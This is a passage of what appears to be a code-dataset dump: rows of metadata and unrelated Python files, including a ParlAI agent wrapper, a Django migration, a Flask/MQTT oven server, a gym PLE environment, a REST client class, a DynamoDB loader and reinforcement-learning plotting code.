name = "vocab_alpha1e1"
elif "convai2.vocab.alpha.1e-2" in model:
name = "vocab_alpha1e2"
elif "convai2.vocab.alpha.1e-3" in model:
name = "vocab_alpha1e3"
elif "eli5.context_and_label" in model:
name = "rep_eli5_ctxt_and_label"
elif "eli5.context" in model:
name = "rep_eli5_ctxt"
elif "eli5.label" in model:
name = "rep_eli5_label"
else:
raise Exception(f"wrong model: {model}")
option, model_class = self.set_options(
name=f"zoo:dialogue_unlikelihood/{name}/model",
path="projects.dialogue_unlikelihood.agents",
class_name="RepetitionUnlikelihoodAgent",
)
super().__init__(
device=device,
name=model,
maxlen=maxlen,
suffix="\n",
model=create_agent_from_opt_file_and_model_class(
opt=option,
model_class=model_class,
),
)
if "wizard_of_wikipedia" in model:
inherit(self, (WizardOfWikipediaAgent, Seq2SeqLM))
self.build_wizard_of_wikipedia()
elif "convai2" in model:
inherit(self, (ConvAI2Agent, Seq2SeqLM))
@staticmethod
def available_models():
return [
"unlikelihood.wizard_of_wikipedia.context_and_label",
"unlikelihood.wizard_of_wikipedia.context",
"unlikelihood.wizard_of_wikipedia.label",
"unlikelihood.convai2.context_and_label",
"unlikelihood.convai2.context",
"unlikelihood.convai2.label",
"unlikelihood.convai2.vocab.alpha.1e-0",
"unlikelihood.convai2.vocab.alpha.1e-1",
"unlikelihood.convai2.vocab.alpha.1e-2",
"unlikelihood.convai2.vocab.alpha.1e-3",
"unlikelihood.eli5.context_and_label",
"unlikelihood.eli5.context",
"unlikelihood.eli5.label",
]
def set_options(self, name, path, class_name, device):
option = {
"n_image_tokens": 1,
"n_image_channels": 1,
"image_fusion_type": "late",
}
add_datapath_and_model_args(option)
datapath = option.get('datapath')
option['model_file'] = modelzoo_path(datapath, name)
option["override"] = {
"no_cuda": False if "cuda" in device else True,
}
my_module = importlib.import_module(path)
model_class = getattr(my_module, class_name)
return option, model_class
@staticmethod
def default_maxlen():
return 128
| 3,328
| 181
| 23
|
b11059298c8234b3e10476c7c2a4e80a7072ec74
| 1,085
|
py
|
Python
|
src/account/migrations/0002_auto_20200412_1356.py
|
kravchenko89/test
|
9eb43e6e96ec198fa433c775f1ffa0f02022e6e4
|
[
"MIT"
] | null | null | null |
src/account/migrations/0002_auto_20200412_1356.py
|
kravchenko89/test
|
9eb43e6e96ec198fa433c775f1ffa0f02022e6e4
|
[
"MIT"
] | 6
|
2021-03-19T10:08:06.000Z
|
2022-02-10T14:03:57.000Z
|
src/account/migrations/0002_auto_20200412_1356.py
|
kravchenko89/test
|
9eb43e6e96ec198fa433c775f1ffa0f02022e6e4
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.10 on 2020-04-12 13:56
import django.core.validators
from django.db import migrations, models
import django_countries.fields
| 30.138889
| 191
| 0.582488
|
# Generated by Django 2.2.10 on 2020-04-12 13:56
import django.core.validators
from django.db import migrations, models
import django_countries.fields
class Migration(migrations.Migration):
dependencies = [
('account', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='user',
name='bio',
field=models.TextField(blank=True, max_length=500),
),
migrations.AddField(
model_name='user',
name='birth_date',
field=models.DateField(blank=True, null=True),
),
migrations.AddField(
model_name='user',
name='country',
field=django_countries.fields.CountryField(blank=True, max_length=2, null=True),
),
migrations.AddField(
model_name='user',
name='phone',
field=models.CharField(blank=True, max_length=17, null=True, validators=[django.core.validators.RegexValidator(message='it should be: +************', regex='^\\+?1?\\d{9,15}$')]),
),
]
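As an illustration only (not part of the migration): the phone validator above accepts an optional leading '+', an optional '1', and then 9 to 15 digits. A standalone check of the same pattern:
import re
PHONE_RE = re.compile(r'^\+?1?\d{9,15}$')      # same pattern as the RegexValidator above
print(bool(PHONE_RE.match('+380501234567')))   # True  -- 12 digits after the optional '+'
print(bool(PHONE_RE.match('12345')))           # False -- too short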
| 0
| 909
| 23
|
d34c7fe1bde2e41f49f5f3ca9ebb728a7f0a3605
| 1,570
|
py
|
Python
|
model_lstm/setup.py
|
ofbennett/sentiment-analysis-app
|
94362ae3e638daeec29e09065549fd4078af8a1a
|
[
"MIT"
] | 2
|
2020-10-04T16:58:54.000Z
|
2021-10-04T13:51:10.000Z
|
model_lstm/setup.py
|
ofbennett/sentiment-analysis-app
|
94362ae3e638daeec29e09065549fd4078af8a1a
|
[
"MIT"
] | null | null | null |
model_lstm/setup.py
|
ofbennett/sentiment-analysis-app
|
94362ae3e638daeec29e09065549fd4078af8a1a
|
[
"MIT"
] | null | null | null |
from setuptools import find_packages, setup
from pathlib import Path
NAME = 'model_lstm'
DESCRIPTION = 'LSTM model which classifies the sentiment of English sentences.'
URL = 'https://github.com/ofbennett/sentiment-analysis-app'
EMAIL = 'contact.me.ob@gmail.com'
AUTHOR = 'Oscar Bennett'
REQUIRES_PYTHON = '>=3.7.0'
ROOT_DIR = Path(__file__).resolve().parent
PACKAGE_DIR = ROOT_DIR / 'model_lstm'
LONG_DESCRIPTION = (PACKAGE_DIR / 'README.md').read_text(encoding='utf-8')
with open(PACKAGE_DIR / 'VERSION') as f:
VERSION = f.read().strip()
setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type='text/markdown',
author=AUTHOR,
author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
packages=find_packages(exclude=('tests',)),
package_data={'model_lstm': ['VERSION',
'README.md',
f'trained_models/lstm_model_v{VERSION}.h5',
f'trained_models/lstm_pipeline_v{VERSION}.pkl']},
install_requires=list_reqs(),
extras_require={},
license='MIT',
classifiers=[
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
],
)
| 34.130435
| 82
| 0.652229
|
from setuptools import find_packages, setup
from pathlib import Path
NAME = 'model_lstm'
DESCRIPTION = 'LSTM model which classifies the sentiment of English sentences.'
URL = 'https://github.com/ofbennett/sentiment-analysis-app'
EMAIL = 'contact.me.ob@gmail.com'
AUTHOR = 'Oscar Bennett'
REQUIRES_PYTHON = '>=3.7.0'
ROOT_DIR = Path(__file__).resolve().parent
PACKAGE_DIR = ROOT_DIR / 'model_lstm'
LONG_DESCRIPTION = (PACKAGE_DIR / 'README.md').read_text(encoding='utf-8')
with open(PACKAGE_DIR / 'VERSION') as f:
VERSION = f.read().strip()
def list_reqs(fname='requirements.txt'):
with open(fname) as fd:
return fd.read().splitlines()
setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type='text/markdown',
author=AUTHOR,
author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
packages=find_packages(exclude=('tests',)),
package_data={'model_lstm': ['VERSION',
'README.md',
f'trained_models/lstm_model_v{VERSION}.h5',
f'trained_models/lstm_pipeline_v{VERSION}.pkl']},
install_requires=list_reqs(),
extras_require={},
license='MIT',
classifiers=[
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
],
)
| 85
| 0
| 23
|
70753e98dbe35bdd622af25516015fa34134b692
| 4,757
|
py
|
Python
|
domains/domains/ple/ple_env.py
|
ramya-ram/discovering-blind-spots
|
091de837663ff3b0208ea90df9ce7a9eeb6343fe
|
[
"MIT"
] | null | null | null |
domains/domains/ple/ple_env.py
|
ramya-ram/discovering-blind-spots
|
091de837663ff3b0208ea90df9ce7a9eeb6343fe
|
[
"MIT"
] | null | null | null |
domains/domains/ple/ple_env.py
|
ramya-ram/discovering-blind-spots
|
091de837663ff3b0208ea90df9ce7a9eeb6343fe
|
[
"MIT"
] | 3
|
2020-03-13T18:35:31.000Z
|
2020-07-20T03:24:37.000Z
|
import gym
from gym import spaces
from ple import PLE
import numpy as np
| 38.056
| 134
| 0.64074
|
import gym
from gym import spaces
from ple import PLE
import numpy as np
def process_state_prespecified(state):
return np.array([ state.values() ])
def process_state(state):
return np.array(state)
class PLEEnv(gym.Env):
metadata = {'render.modes': ['human', 'rgb_array']}
def __init__(self, prespecified_game=True, game_name='FlappyBird', display_screen=True, rgb_state=False):
# Open up a game state to communicate with emulator
import importlib
if prespecified_game:
game_module_name = ('ple.games.%s' % game_name).lower()
else:
game_module_name = ('domains.ple.%s' % game_name).lower()
game_module = importlib.import_module(game_module_name)
self.game = getattr(game_module, game_name)()
self.rgb_state = rgb_state
if self.rgb_state:
self.game_state = PLE(self.game, fps=30, display_screen=display_screen)
else:
if prespecified_game:
self.game_state = PLE(self.game, fps=30, display_screen=display_screen, state_preprocessor=process_state_prespecified)
else:
self.game_state = PLE(self.game, fps=30, display_screen=display_screen, state_preprocessor=process_state)
self.game_state.init()
self._action_set = self.game_state.getActionSet()
self.action_space = spaces.Discrete(len(self._action_set))
if self.rgb_state:
self.state_width, self.state_height = self.game_state.getScreenDims()
self.observation_space = spaces.Box(low=0, high=255, shape=(self.state_width, self.state_height, 3))
else:
self.state_dim = self.game_state.getGameStateDims()
self.observation_space = spaces.Box(low=0, high=255, shape=self.state_dim)
self.viewer = None
self.feature_bins = []
if hasattr(self.game, 'feature_bins'):
self.feature_bins = self.game.feature_bins
def get_source_state(self, state):
if hasattr(self.game, 'get_source_state'):
return self.game.get_source_state(state)
return None
def generate_training_subset(self, percent_sim_data):
if hasattr(self.game, 'generate_training_subset'):
return self.game.generate_training_subset(percent_sim_data)
def set_to_training_set(self):
if hasattr(self.game, 'set_to_training_set'):
return self.game.set_to_training_set()
def set_to_testing_set(self):
if hasattr(self.game, 'set_to_testing_set'):
return self.game.set_to_testing_set()
def get_uniform_state_weights(self):
if hasattr(self.game, 'get_uniform_state_weights'):
return self.game.get_uniform_state_weights()
else:
states = self.get_states()
weights = np.ones(len(states))
weights = [float(i)/sum(weights) for i in weights]
return states, weights
def get_states(self):
if hasattr(self.game, 'states'):
return self.game.states
def _step(self, a):
reward = self.game_state.act(self._action_set[a])
state = self._get_state()
terminal = self.game_state.game_over()
return state, reward, terminal, {}
def _get_image(self, game_state):
image_rotated = np.fliplr(np.rot90(game_state.getScreenRGB(),3)) # Hack to fix the rotated image returned by ple
return image_rotated
def _get_state(self):
if self.rgb_state:
return self._get_image(self.game_state)
else:
return self.game_state.getGameState()
@property
def _n_actions(self):
return len(self._action_set)
def _reset(self):
if self.rgb_state:
self.observation_space = spaces.Box(low=0, high=255, shape=(self.state_width, self.state_height, 3))
else:
self.observation_space = spaces.Box(low=0, high=255, shape=self.state_dim)
self.game_state.reset_game()
state = self._get_state()
return state
def _render(self, mode='human', close=False):
if close:
if self.viewer is not None:
self.viewer.close()
self.viewer = None
return
img = self._get_image(self.game_state)
if mode == 'rgb_array':
return img
elif mode == 'human':
from gym.envs.classic_control import rendering
if self.viewer is None:
self.viewer = rendering.SimpleImageViewer()
self.viewer.imshow(img)
def _seed(self, seed):
rng = np.random.RandomState(seed)
self.game_state.rng = rng
self.game_state.game.rng = self.game_state.rng
self.game_state.init()
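A rough sketch of driving PLEEnv directly through its internal old-gym-style methods (_reset/_step); FlappyBird, display_screen=False and the random policy are illustrative choices, and the ple package plus the game assets must be installed for this to run:
import numpy as np
env = PLEEnv(prespecified_game=True, game_name='FlappyBird', display_screen=False, rgb_state=False)
state = env._reset()
done = False
total_reward = 0.0
while not done:
    a = np.random.randint(env._n_actions)     # random policy, only to exercise the loop
    state, reward, done, _ = env._step(a)
    total_reward += reward
print('episode return:', total_reward)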
| 4,167
| 449
| 69
|
d720558039425b7b46dedfcf73d7c8783c9496cd
| 579
|
py
|
Python
|
Python/Fundamentals/io_switch.py
|
Gjacquenot/training-material
|
16b29962bf5683f97a1072d961dd9f31e7468b8d
|
[
"CC-BY-4.0"
] | 115
|
2015-03-23T13:34:42.000Z
|
2022-03-21T00:27:21.000Z
|
Python/Fundamentals/io_switch.py
|
Gjacquenot/training-material
|
16b29962bf5683f97a1072d961dd9f31e7468b8d
|
[
"CC-BY-4.0"
] | 56
|
2015-02-25T15:04:26.000Z
|
2022-01-03T07:42:48.000Z
|
Python/Fundamentals/io_switch.py
|
Gjacquenot/training-material
|
16b29962bf5683f97a1072d961dd9f31e7468b8d
|
[
"CC-BY-4.0"
] | 59
|
2015-11-26T11:44:51.000Z
|
2022-03-21T00:27:22.000Z
|
#!/usr/bin/env python
if __name__ == '__main__':
from argparse import ArgumentParser
from io import StringIO
import sys
arg_parser = ArgumentParser(description='I/O test')
arg_parser.add_argument('-o', dest='output', help='output file')
options = arg_parser.parse_args()
str_io = StringIO()
for line in ['abc', 'def', 'ghi']:
str_io.write(line + '\n')
if options.output:
output = open(options.output, 'w')
else:
output = sys.stdout
output.write(str_io.getvalue())
if options.output:
output.close()
| 28.95
| 68
| 0.632124
|
#!/usr/bin/env python
if __name__ == '__main__':
from argparse import ArgumentParser
from io import StringIO
import sys
arg_parser = ArgumentParser(description='I/O test')
arg_parser.add_argument('-o', dest='output', help='output file')
options = arg_parser.parse_args()
str_io = StringIO()
for line in ['abc', 'def', 'ghi']:
str_io.write(line + '\n')
if options.output:
output = open(options.output, 'w')
else:
output = sys.stdout
output.write(str_io.getvalue())
if options.output:
output.close()
| 0
| 0
| 0
|
9df7df112f519136b1e342846112fa1c98437980
| 4,102
|
py
|
Python
|
app.py
|
banana-breads/SmartOven
|
d5a79a77ceca6269252d27b350d6d6ccd76f3000
|
[
"MIT"
] | 3
|
2022-01-30T18:00:26.000Z
|
2022-01-30T18:03:34.000Z
|
app.py
|
banana-breads/SmartOven
|
d5a79a77ceca6269252d27b350d6d6ccd76f3000
|
[
"MIT"
] | 10
|
2022-01-30T21:06:40.000Z
|
2022-02-03T09:42:36.000Z
|
app.py
|
banana-breads/SmartOven
|
d5a79a77ceca6269252d27b350d6d6ccd76f3000
|
[
"MIT"
] | 1
|
2022-02-01T12:48:05.000Z
|
2022-02-01T12:48:05.000Z
|
import json
from flask import Flask
from flasgger import Swagger
from globals import connected_devices, Oven
import os
import recipes
import ovens
import recipe_search_online
import db
from mqtt_shared import mqtt_manager, mqtt_topics
from constants import MONGO_URI, MONGO_URI_TEST
import argparse
from spec import SWAGGER_TEMPLATE, dump_apispecs_to_json
from flask_pymongo import PyMongo
swagger = None
# TODO have blueprints in a separate module
# Arguments
parser = argparse.ArgumentParser(description="SmartOven Flask server")
parser.add_argument('-t', '--test',
help='Run the server in testing mode',
action="store_true"
)
if __name__ == "__main__":
args = parser.parse_args()
create_app(testing=args.test)
app.run(debug=False)
| 29.941606
| 75
| 0.627986
|
import json
from flask import Flask
from flasgger import Swagger
from globals import connected_devices, Oven
import os
import recipes
import ovens
import recipe_search_online
import db
from mqtt_shared import mqtt_manager, mqtt_topics
from constants import MONGO_URI, MONGO_URI_TEST
import argparse
from spec import SWAGGER_TEMPLATE, dump_apispecs_to_json
from flask_pymongo import PyMongo
swagger = None
# TODO have blueprints in a separate module
# Arguments
parser = argparse.ArgumentParser(description="SmartOven Flask server")
parser.add_argument('-t', '--test',
help='Run the server in testing mode',
action="store_true"
)
def create_app(test_config=None, testing=None):
global app, swagger
app = Flask(__name__, instance_relative_config=True)
if not testing:
app.config.from_mapping(
SECRET_KEY='dev',
MONGO_URI=MONGO_URI,
)
else:
app.config.from_mapping(
SECRET_KEY='test',
MONGO_URI=MONGO_URI_TEST,
)
# Setting up Swagger API
app.config['SWAGGER'] = {
'uiversion': 3,
'openapi': '3.0.2'
}
swagger = Swagger(app, template=SWAGGER_TEMPLATE)
if test_config is None:
# load the instance config, if it exists, when not testing
app.config.from_pyfile('config.py', silent=True)
else:
# load the test config if passed in
app.config.from_mapping(test_config)
# Ensure the instance folder exists
try:
os.makedirs(app.instance_path)
except OSError:
pass
db.init_app(app)
# App blueprints
app.register_blueprint(recipes.bp)
app.register_blueprint(ovens.bp)
app.register_blueprint(recipe_search_online.bp)
# Save OpenAPI specs
# with app.app_context():
# dump_apispecs_to_json(swagger)
mqtt_manager.start("server", 1, [
(mqtt_topics.CONNECT, _handle_device_connect),
(mqtt_topics.DISCONNECT, _handle_device_disconnect)
])
return app
def _handle_device_connect(client, userdata, msg):
client_id = client._client_id.decode()
device_id = msg.payload.decode()
if client_id == device_id:
return
if device_id not in connected_devices:
connected_devices[device_id] = Oven(device_id)
print(f'Device connected {device_id}')
'''
new device connected
subscribe and handle messages sent
    to its corresponding topic
'''
def _handle_device_info(client, userdata, msg):
topic = msg.topic
payload = msg.payload.decode()
data = json.loads(payload)
info_type = topic.split('/')[-1]
print(data)
if device_id not in connected_devices:
# TODO logging
print(f'Device {device_id} not connected')
return
device = connected_devices[device_id]
if info_type == 'temperature':
device.temperature = data
elif info_type == 'recipe_details':
device.recipe_info = data
elif info_type == 'time':
device.time = data
elif info_type == 'state':
device.state = data
elif info_type == 'recipe_done':
# can be replace with notifications in production
print(data.get('message', "Recipe done"))
topic = mqtt_topics.INFO_PREFIX.format(device_id=device_id) + "/#"
mqtt_manager.register_callback(topic, _handle_device_info)
def _handle_device_disconnect(client, userdata, msg):
device_id = msg.payload.decode()
connected_devices.pop(device_id, None)
print(f'Device disconnected {device_id}')
topic = mqtt_topics.INFO_PREFIX.format(device_id=device_id) + "/#"
mqtt_manager.unsubscribe(topic)
if __name__ == "__main__":
args = parser.parse_args()
create_app(testing=args.test)
app.run(debug=False)
| 3,227
| 0
| 75
|
cfebce4ce5effba03e6fe213972dd94622cfecd1
| 511
|
py
|
Python
|
msg_90s_celular_20_02_2019/converte_num_letra.py
|
python-joinville/dojo-puzzles
|
412d8d3443b2cdb492fa9a77c08a876a182994ee
|
[
"MIT"
] | 3
|
2018-07-31T19:49:43.000Z
|
2019-06-28T20:52:58.000Z
|
msg_90s_celular_20_02_2019/converte_num_letra.py
|
python-joinville/dojo-puzzles
|
412d8d3443b2cdb492fa9a77c08a876a182994ee
|
[
"MIT"
] | null | null | null |
msg_90s_celular_20_02_2019/converte_num_letra.py
|
python-joinville/dojo-puzzles
|
412d8d3443b2cdb492fa9a77c08a876a182994ee
|
[
"MIT"
] | 1
|
2018-07-28T19:36:48.000Z
|
2018-07-28T19:36:48.000Z
|
tabela = {'2': 'a',
'3':'d',
'5':'j',
'4':'g',
'6':'m',
'7':'p',
'8':'t',
'9': 'w',
'0': ' ',
}
| 22.217391
| 47
| 0.403131
|
tabela = {'2': 'a',
'3':'d',
'5':'j',
'4':'g',
'6':'m',
'7':'p',
'8':'t',
'9': 'w',
'0': ' ',
}
def converte_num_letra(digitos):
    # Multi-tap decoding: repeated presses of the same key advance through that key's letters.
    palavra = ''
    letra = ''
    sequencia = ''
    for digito in digitos:
        if letra != '' and digito != letra:
            # key changed: turn the previous run of presses into a single letter
            palavra = palavra + chr(ord(tabela[letra]) + len(sequencia) - 1)
            sequencia = digito
        else:
            sequencia += digito
        letra = digito
    if letra != '':
        palavra = palavra + chr(ord(tabela[letra]) + len(sequencia) - 1)
    return palavra
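A quick example of the multi-tap decoding above: repeated presses of one key advance through that key's letters, so three presses of 6 give 'o' and three presses of 4 give 'i'.
print(converte_num_letra('666444'))   # oi
print(converte_num_letra('999666'))   # yo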
| 311
| 0
| 23
|
494aaca2f4ace6c6bc7d69520a23e5deddd3db65
| 720
|
py
|
Python
|
src/Chapter 3/Exercise 7.py
|
group9BSE1/BSE-2021
|
bea904fce079b856c26f8c06bd734176bdc4d70d
|
[
"MIT"
] | 1
|
2021-03-27T19:01:49.000Z
|
2021-03-27T19:01:49.000Z
|
src/Chapter 3/Exercise 7.py
|
group9BSE1/BSE-2021
|
bea904fce079b856c26f8c06bd734176bdc4d70d
|
[
"MIT"
] | null | null | null |
src/Chapter 3/Exercise 7.py
|
group9BSE1/BSE-2021
|
bea904fce079b856c26f8c06bd734176bdc4d70d
|
[
"MIT"
] | null | null | null |
# location
location = input("Job Location:\n")
pay = input("Payment:\n")
# Prints For decisions
no = "No thanks,I can find something Better"
doubt = "Without a doubt I'll take it"
sure = "Sure, I can work with that"
no_way = "No way!"
# Try and Except
try:
location = str(location)
pay = float(pay)
except:
print("Error, Invalid input")
# After Except
if location == "Mbarara":
if pay == 4000000:
print(no)
else:
if pay > 4000000:
print(sure)
elif location == "Kampala":
if pay == 10000000:
print(no_way)
else:
if pay >= 10000000:
print(sure)
elif location == "space":
print(doubt)
else:
if pay >= 6000000:
print(sure)
| 21.176471
| 44
| 0.594444
|
# location
location = input("Job Location:\n")
pay = input("Payment:\n")
# Prints For decisions
no = "No thanks,I can find something Better"
doubt = "Without a doubt I'll take it"
sure = "Sure, I can work with that"
no_way = "No way!"
# Try and Except
try:
location = str(location)
pay = float(pay)
except:
print("Error, Invalid input")
# After Except
if location == "Mbarara":
if pay == 4000000:
print(no)
else:
if pay > 4000000:
print(sure)
elif location == "Kampala":
if pay == 10000000:
print(no_way)
else:
if pay >= 10000000:
print(sure)
elif location == "space":
print(doubt)
else:
if pay >= 6000000:
print(sure)
| 0
| 0
| 0
|
ac9894d149ca837137178fd7b2aa80f309e87fd9
| 1,985
|
py
|
Python
|
simple_rest_client/api.py
|
allisson/python-simple-rest-client
|
c5b9a4848adac78212b86ebb736e51e8b50e64d8
|
[
"MIT"
] | 163
|
2017-04-13T21:24:12.000Z
|
2022-02-21T04:55:47.000Z
|
simple_rest_client/api.py
|
allisson/python-simple-rest-client
|
c5b9a4848adac78212b86ebb736e51e8b50e64d8
|
[
"MIT"
] | 39
|
2017-08-02T14:46:12.000Z
|
2021-12-10T12:57:29.000Z
|
simple_rest_client/api.py
|
allisson/python-simple-rest-client
|
c5b9a4848adac78212b86ebb736e51e8b50e64d8
|
[
"MIT"
] | 50
|
2017-06-05T22:39:52.000Z
|
2021-12-26T21:09:52.000Z
|
from slugify import slugify
from .resource import Resource
| 33.644068
| 105
| 0.652393
|
from slugify import slugify
from .resource import Resource
class API:
def __init__(
self,
api_root_url=None,
params=None,
headers=None,
timeout=None,
append_slash=False,
json_encode_body=False,
ssl_verify=None,
):
self.api_root_url = api_root_url
self.params = params or {}
self.headers = headers or {}
self.timeout = timeout
self.append_slash = append_slash
self.json_encode_body = json_encode_body
self.ssl_verify = True if ssl_verify is None else ssl_verify
self._resources = {}
def add_resource(
self,
api_root_url=None,
resource_name=None,
resource_class=None,
params=None,
headers=None,
timeout=None,
append_slash=None,
json_encode_body=None,
ssl_verify=None,
):
resource_class = resource_class or Resource
resource = resource_class(
api_root_url=api_root_url if api_root_url is not None else self.api_root_url,
resource_name=resource_name,
params=params if params is not None else self.params,
headers=headers if headers is not None else self.headers,
timeout=timeout if timeout is not None else self.timeout,
append_slash=append_slash if append_slash is not None else self.append_slash,
json_encode_body=json_encode_body if json_encode_body is not None else self.json_encode_body,
ssl_verify=ssl_verify if ssl_verify is not None else self.ssl_verify,
)
self._resources[resource_name] = resource
resource_valid_name = self.correct_attribute_name(resource_name)
setattr(self, resource_valid_name, resource)
def get_resource_list(self):
return list(self._resources.keys())
def correct_attribute_name(self, name):
slug_name = slugify(name)
return slug_name.replace("-", "_")
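A brief usage sketch of the API class, relying only on what the code above shows: add_resource registers a Resource and exposes it as an attribute whose name is slugified with dashes turned into underscores (the URL is a placeholder):
api = API(api_root_url='https://example.com/api/v1', timeout=5)
api.add_resource(resource_name='users')
api.add_resource(resource_name='blog-posts')
print(api.get_resource_list())        # ['users', 'blog-posts']
print(api.users)                      # the Resource instance registered under 'users'
print(api.blog_posts)                 # 'blog-posts' is exposed as the attribute 'blog_posts'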
| 1,805
| -11
| 130
|
c64480096569db772606bfc626022fbec11fab93
| 1,753
|
py
|
Python
|
broker-manager/SearchDate.py
|
victor-prado/broker-manager
|
b056cf59247e41e890b1443c0c9e44832b79c51a
|
[
"MIT"
] | null | null | null |
broker-manager/SearchDate.py
|
victor-prado/broker-manager
|
b056cf59247e41e890b1443c0c9e44832b79c51a
|
[
"MIT"
] | null | null | null |
broker-manager/SearchDate.py
|
victor-prado/broker-manager
|
b056cf59247e41e890b1443c0c9e44832b79c51a
|
[
"MIT"
] | null | null | null |
import tkinter as tk
from Data import Data
from EditClient import EditClient
#Arrumar!
#root = tk.Tk()
#app = SearchDate(master=root)
#app.mainloop()
#data = Data()
#data.db.close()
| 28.274194
| 77
| 0.541928
|
import tkinter as tk
from Data import Data
from EditClient import EditClient
class SearchDate(tk.Frame, Data):
def __init__(self, master=None):
super().__init__(master)
self.frame = tk.Frame(self.master)
self.frame.grid()
self.create_table()
def create_entry(self, row_value, message):
L = tk.Label(self.master, text=message)
L.grid(row=row_value, column=0)
E = tk.Entry(self.master, bd=5)
E.grid(row=row_value, column=1)
return E
def create_table(self):
global E1
E1 = self.create_entry(0, "Data")
B1 = tk.Button(self.master, text="Buscar",
command=self.search_date)
B1.grid(row=0, column=2)
def search_date(self):
parameter = E1.get()
ids = self.contractByDate(parameter)
#print(ids)
self.frame.destroy()
self.frame = tk.Frame(self.master)
self.frame.grid()
i=0
for line in ids:
self.get_contract(line)
self.get_client(self.contract["id_client"])
try:
result = self.client["name"]
except:
result = "(Sem nome)"
button = tk.Button(self.frame, text=result,
command= lambda id_client = self.client["id"]:
self.open_client(id_client))
button.grid()
i=i+1
def open_client(self, id_client):
top = tk.Tk()
client = EditClient(master=top, id_client=id_client)
client.addButtons()
#Arrumar!
#root = tk.Tk()
#app = SearchDate(master=root)
#app.mainloop()
#data = Data()
#data.db.close()
| 1,399
| 12
| 158
|
2d82e8a5afd34b19a82dd079954acdf19ab0b1a0
| 467
|
py
|
Python
|
lego-catalog/backend/resources/scripts/populate_dynamodb.py
|
neovasili/101_serverless_workshop
|
a005ab4af620c3c1a522aab8d201378ea7840ab5
|
[
"MIT"
] | 4
|
2019-11-13T17:58:15.000Z
|
2020-03-12T12:24:10.000Z
|
lego-catalog/backend/resources/scripts/populate_dynamodb.py
|
neovasili/101_serverless_workshop
|
a005ab4af620c3c1a522aab8d201378ea7840ab5
|
[
"MIT"
] | null | null | null |
lego-catalog/backend/resources/scripts/populate_dynamodb.py
|
neovasili/101_serverless_workshop
|
a005ab4af620c3c1a522aab8d201378ea7840ab5
|
[
"MIT"
] | null | null | null |
import boto3
import json
session = boto3.session.Session( profile_name= 'jmcore' )
dynamodb = session.resource( 'dynamodb', region_name= 'eu-west-1' )
table = dynamodb.Table( 'serverless_workshop' )
with open( "user-sets-data.json" ) as json_file:
users = json.load( json_file )
for user in users:
userID = user[ 'userID' ]
sets = user[ 'sets' ]
response = table.put_item(
Item = {
'userID': userID,
'sets': sets
}
)
| 24.578947
| 67
| 0.631692
|
import boto3
import json
session = boto3.session.Session( profile_name= 'jmcore' )
dynamodb = session.resource( 'dynamodb', region_name= 'eu-west-1' )
table = dynamodb.Table( 'serverless_workshop' )
with open( "user-sets-data.json" ) as json_file:
users = json.load( json_file )
for user in users:
userID = user[ 'userID' ]
sets = user[ 'sets' ]
response = table.put_item(
Item = {
'userID': userID,
'sets': sets
}
)
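For context, the script above only assumes that user-sets-data.json is a list of objects with userID and sets keys; a minimal illustration of that shape (values are made up):
example_users = [
    {"userID": "user-001", "sets": ["75192", "10276"]},
    {"userID": "user-002", "sets": []},
]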
| 0
| 0
| 0
|
d9beda75cf8f601813cb1e0106a06881bcd28dbb
| 4,306
|
py
|
Python
|
ml/sarsa/gym-minigrid/tests.py
|
AlinMH/C-Projects
|
1e11b4fd1b96045b4b810d5892b2be73c1d5d886
|
[
"MIT"
] | null | null | null |
ml/sarsa/gym-minigrid/tests.py
|
AlinMH/C-Projects
|
1e11b4fd1b96045b4b810d5892b2be73c1d5d886
|
[
"MIT"
] | null | null | null |
ml/sarsa/gym-minigrid/tests.py
|
AlinMH/C-Projects
|
1e11b4fd1b96045b4b810d5892b2be73c1d5d886
|
[
"MIT"
] | null | null | null |
from sarsa_skel import *
if __name__ == '__main__':
plot_softmax("MiniGrid-Empty-6x6-v0")
| 46.804348
| 105
| 0.51974
|
from sarsa_skel import *
def plot_egreedy(map):
c1 = 0.5
lr1 = 0.1
d1 = 0.99
q01 = 0
steps1, avg_lengths1, avg_returns1 = sarsa_egreedy(map_file=map, learning_rate=lr1,
discount=d1, const=c1, train_episodes=500, q0=q01,
final_show=False)
c2 = 0.5
lr2 = 0.1
d2 = 0.99
q02 = 0.2
steps2, avg_lengths2, avg_returns2 = sarsa_egreedy(map_file=map, learning_rate=lr2,
discount=d2, const=c2, train_episodes=500, q0=q02,
final_show=False)
c3 = 0.5
lr3 = 0.1
d3 = 0.99
q03 = 0.5
steps3, avg_lengths3, avg_returns3 = sarsa_egreedy(map_file=map, learning_rate=lr3,
discount=d3, const=c3, train_episodes=500, q0=q03,
final_show=False)
c4 = 0.5
lr4 = 0.1
d4 = 0.99
q04 = 1
steps4, avg_lengths4, avg_returns4 = sarsa_egreedy(map_file=map, learning_rate=lr4,
discount=d4, const=c4, train_episodes=500, q0=q04,
final_show=False)
_fig, (ax1, ax2) = plt.subplots(ncols=2)
ax1.plot(steps1, avg_lengths1, label="egreedy c:" + str(c1) + " lr=" + str(lr1) + " q0=" + str(q01))
ax1.plot(steps2, avg_lengths2, label="egreedy c:" + str(c2) + " lr=" + str(lr2) + " q0=" + str(q02))
ax1.plot(steps3, avg_lengths3, label="egreedy c:" + str(c3) + " lr=" + str(lr3) + " q0=" + str(q03))
ax1.plot(steps4, avg_lengths4, label="egreedy c:" + str(c4) + " lr=" + str(lr4) + " q0=" + str(q04))
ax1.set_title("Average episode length")
ax1.legend()
ax2.plot(steps1, avg_returns1, label="egreedy c:" + str(c1) + " lr=" + str(lr1) + " q0=" + str(q01))
ax2.plot(steps2, avg_returns2, label="egreedy c:" + str(c2) + " lr=" + str(lr2) + " q0=" + str(q02))
ax2.plot(steps3, avg_returns3, label="egreedy c:" + str(c3) + " lr=" + str(lr3) + " q0=" + str(q03))
ax2.plot(steps4, avg_returns4, label="egreedy c:" + str(c4) + " lr=" + str(lr4) + " q0=" + str(q04))
